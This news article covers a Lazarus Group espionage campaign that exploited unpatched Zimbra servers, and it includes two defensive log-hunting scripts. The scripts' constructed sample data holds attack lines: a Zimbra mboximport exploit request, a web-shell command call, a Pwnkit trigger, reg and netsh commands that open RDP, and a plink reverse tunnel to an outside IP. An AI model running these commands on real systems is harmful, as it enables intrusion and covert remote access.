A new intelligence-gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra servers to compromise victim systems.
That's according to Finnish cybersecurity firm WithSecure (formerly F-Secure), which codenamed the incident No Pineapple.
Targets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain.
Around 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022.
"The threat actor gained access to the network by exploiting a vulnerable Zimbra mail server at the end of August," WithSecure said in a detailed technical report shared with The Hacker News.
The security flaws used for initial access are CVE-2022-27925, a directory traversal in Zimbra's mboximport handler that lets a crafted ZIP archive write files outside the intended directory, and CVE-2022-37042, an authentication bypass for that same endpoint; chained together, they allow an unauthenticated attacker to gain remote code execution on the underlying server.
This step was followed by the installation of web shells and the exploitation of a local privilege escalation vulnerability on the Zimbra host (Pwnkit, aka CVE-2021-4034, in polkit's pkexec binary rather than in Zimbra itself), thereby enabling the threat actor to harvest sensitive mailbox data.
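The initial-access chain above leaves artifacts in two places a responder can check: Zimbra's mailboxd access log (requests to the abused mboximport endpoint, followed by hits on a freshly dropped .jsp) and the host's auth log (pkexec writes a distinctive message when Pwnkit is triggered with an invalid SHELL environment). The following script is an added example written for this article, not WithSecure's tooling or anything from the report; the log lines are constructed, the access-log layout is assumed to be Jetty's NCSA combined format, and the web shell path is a made-up illustration.

```python
"""Hunt for the No Pineapple initial-access stage in Zimbra and host logs.

Added example for this article; not WithSecure's or Zimbra's code.
All sample log lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Endpoint abused by CVE-2022-27925 (path traversal in the ZIP extraction)
# and CVE-2022-37042 (authentication bypass for the same handler).
MBOXIMPORT = "/service/extension/backup/mboximport"

# Assumed layout: Jetty NCSA combined format, as used by Zimbra's mailboxd.
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Messages pkexec emits (syslog, LOG_CRIT) when CVE-2021-4034 is triggered.
# The odd wording ("found the", "suscipious") is verbatim from pkexec's source.
PKEXEC_MARKERS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",
)


@dataclass
class Finding:
    stage: str
    detail: str
    line: str


def parse_access(line: str):
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def scan_zimbra_access(lines):
    """Flag mboximport uploads, then any .jsp hit from the same source afterwards."""
    findings, suspicious_srcs = [], set()
    for line in lines:
        rec = parse_access(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if path.startswith(MBOXIMPORT):
            # Legitimate use is rare and admin-only; an external source hitting it is a red flag.
            suspicious_srcs.add(rec["src"])
            findings.append(Finding(
                "initial-access",
                f"{rec['method']} to mboximport from {rec['src']} (HTTP {rec['status']})",
                line))
        elif path.endswith(".jsp") and rec["src"] in suspicious_srcs:
            # A JSP requested by the same client right after an upload is likely the dropped web shell.
            findings.append(Finding(
                "web-shell",
                f"{rec['method']} {path} from {rec['src']} after mboximport upload",
                line))
    return findings


def scan_auth_log(lines):
    """Flag pkexec log lines carrying the Pwnkit exploitation signature."""
    return [
        Finding("priv-esc", "pkexec logged a CVE-2021-4034 (Pwnkit) signature", line)
        for line in lines
        if "pkexec" in line and any(marker in line for marker in PKEXEC_MARKERS)
    ]


def hunt(access_lines, auth_lines):
    """Combine both scans into one ordered list of findings."""
    return scan_zimbra_access(access_lines) + scan_auth_log(auth_lines)


# Constructed sample data (not real victim logs). 203.0.113.7 is the attacker,
# 198.51.100.20 a normal user; "sync.jsp" is a hypothetical web shell name.
ACCESS_SAMPLE = """\
203.0.113.7 - - [29/Aug/2022:03:14:05 +0000] "POST /service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 389 "-" "python-requests/2.28.1"
203.0.113.7 - - [29/Aug/2022:03:14:09 +0000] "GET /zimbra/public/jsp/sync.jsp?cmd=id HTTP/1.1" 200 57 "-" "python-requests/2.28.1"
198.51.100.20 - - [29/Aug/2022:03:15:00 +0000] "GET /zimbra/public/launchZCS.jsp HTTP/1.1" 200 2012 "-" "Mozilla/5.0"
198.51.100.20 - - [29/Aug/2022:03:15:01 +0000] "POST /service/soap/NoOpRequest HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

AUTH_SAMPLE = """\
Aug 30 01:02:10 mail01 pkexec[21877]: zimbra: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/opt/zimbra] [COMMAND=GCONV_PATH=./pwnkit]
Aug 30 01:02:11 mail01 sshd[21880]: Accepted publickey for zimbra from 10.0.0.5 port 51522 ssh2
"""

if __name__ == "__main__":
    for f in hunt(ACCESS_SAMPLE.splitlines(), AUTH_SAMPLE.splitlines()):
        print(f"[{f.stage}] {f.detail}")
```

On a real host, feed it /opt/zimbra/log/access_log.* and /var/log/auth.log (or journalctl -u polkit output); the .jsp rule deliberately keys on the uploading client rather than on filenames, since a web shell can be named anything.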
Subsequently, in October 2022, the adversary is said to have carried out lateral movement and reconnaissance, and ultimately deployed backdoors such as Dtrack and an updated version of GREASE.
GREASE, which has been attributed to a different North Korea-affiliated threat cluster called Kimsuky, comes with capabilities to create new administrator accounts with remote desktop protocol (RDP) privileges while also bypassing firewall rules.
Dtrack, on the other hand, has been used in cyber attacks aimed at a wide variety of industry verticals, and also in financially motivated attacks involving the use of Maui ransomware.
"At the beginning of November, Cobalt Strike [command-and-control] beacons were detected from an internal server to two threat actor IP addresses," researchers Sami Ruohonen and Stephen Robinson noted, adding that the data exfiltration occurred from November 5, 2022, through November 11, 2022.
Also used in the intrusion were tools like Plink and 3Proxy to set up a proxy on the victim system, echoing previous findings from Cisco Talos about Lazarus Group's attacks targeting energy providers.
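The GREASE behaviour described above (new accounts granted administrator and RDP rights, with firewall rules opened for RDP) and the Plink/3Proxy tunnelling both surface in the Windows Security log as ordinary event sequences. The script below correlates them over exported event records. It is an added example written for this article, not GREASE, Plink, 3Proxy or WithSecure code; the events are constructed dicts shaped like a SIEM's JSON export of event IDs 4720, 4732 and 4688, the field names (time, id, subject, target, member, group, image, cmdline) are assumptions, and the hostnames, accounts and IPs are made up.

```python
"""Correlate Windows Security events for GREASE-style RDP backdoor accounts and
Plink/3Proxy tunnels. Added example for this article; not the malware's or
WithSecure's code. Event records below are constructed, not real telemetry."""
import re
from datetime import datetime, timedelta

PRIV_GROUPS = {"Administrators", "Remote Desktop Users"}
PLINK_REVERSE = re.compile(r"\s-R\s")  # plink -R = remote (reverse) port forward


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_rdp_admin_accounts(events, window=timedelta(hours=1)):
    """4720 (account created) followed within `window` by 4732 (added to a local
    group) for Administrators or Remote Desktop Users. Returns
    (new account, group, creating subject) tuples."""
    created, hits = {}, []
    for e in sorted(events, key=_ts):
        if e["id"] == 4720:
            created[e["target"]] = _ts(e)
        elif e["id"] == 4732 and e.get("group") in PRIV_GROUPS:
            t0 = created.get(e.get("member"))
            if t0 is not None and _ts(e) - t0 <= window:
                hits.append((e["member"], e["group"], e["subject"]))
    return hits


def find_rdp_enablement(events):
    """4688 process creations that switch RDP on or open the firewall for it."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        cmd = e.get("cmdline", "").lower()
        enables_rdp = "fdenytsconnections" in cmd and "/d 0" in cmd
        opens_port = "advfirewall" in cmd and "add rule" in cmd and "3389" in cmd
        if enables_rdp or opens_port:
            hits.append((e["host"], e["subject"], e["cmdline"]))
    return hits


def find_tunnels(events):
    """4688 events for Plink reverse forwards or any 3Proxy launch."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        image = e.get("image", "").lower()
        cmd = e.get("cmdline", "")
        if image.endswith("plink.exe") and PLINK_REVERSE.search(cmd):
            hits.append(("plink reverse tunnel", e["host"], cmd))
        elif image.endswith("3proxy.exe"):
            hits.append(("3proxy", e["host"], cmd))
    return hits


def report(events):
    return {
        "backdoor_accounts": find_rdp_admin_accounts(events),
        "rdp_enablement": find_rdp_enablement(events),
        "tunnels": find_tunnels(events),
    }


# Constructed sample: FS01 shows the full GREASE-like sequence plus a Plink
# reverse tunnel; WS17 shows benign lookalikes that must not fire.
SAMPLE_EVENTS = [
    {"time": "2022-10-12T09:01:00", "id": 4720, "host": "FS01", "subject": "svc_backup", "target": "support01"},
    {"time": "2022-10-12T09:01:05", "id": 4732, "host": "FS01", "subject": "svc_backup", "member": "support01", "group": "Administrators"},
    {"time": "2022-10-12T09:01:06", "id": 4732, "host": "FS01", "subject": "svc_backup", "member": "support01", "group": "Remote Desktop Users"},
    {"time": "2022-10-12T09:02:00", "id": 4688, "host": "FS01", "subject": "svc_backup", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"time": "2022-10-12T09:02:30", "id": 4688, "host": "FS01", "subject": "svc_backup", "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"time": "2022-10-12T09:10:00", "id": 4688, "host": "FS01", "subject": "svc_backup", "image": "C:\\ProgramData\\plink.exe",
     "cmdline": "plink.exe -batch -pw ******** -R 0.0.0.0:8443:127.0.0.1:3389 ops@203.0.113.50"},
    # Benign: group change with no preceding account creation.
    {"time": "2022-10-12T10:00:00", "id": 4732, "host": "WS17", "subject": "helpdesk", "member": "j.doe", "group": "Remote Desktop Users"},
    # Benign: plink used as a git SSH helper, no reverse forward.
    {"time": "2022-10-13T08:00:00", "id": 4688, "host": "WS17", "subject": "j.doe", "image": "C:\\Program Files\\PuTTY\\plink.exe",
     "cmdline": "plink.exe -batch -N git@repo.example"},
]

if __name__ == "__main__":
    for key, value in report(SAMPLE_EVENTS).items():
        print(key, value)
```

The account rule is time-bounded on purpose: a 4732 into Remote Desktop Users on its own is everyday helpdesk work, but the same event within an hour of the account's 4720, by the same subject that then enables RDP and starts a reverse tunnel, is the sequence the text describes.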
North Korea-backed hacking groups have had a busy 2022, conducting both espionage-driven intrusions and cryptocurrency heists that align with the regime's strategic priorities.
Most recently, the BlueNoroff cluster, also known by the names APT38, Copernicium, Stardust Chollima, and TA444, was linked to wide-ranging credential harvesting attacks aimed at the education, financial, government, and healthcare sectors.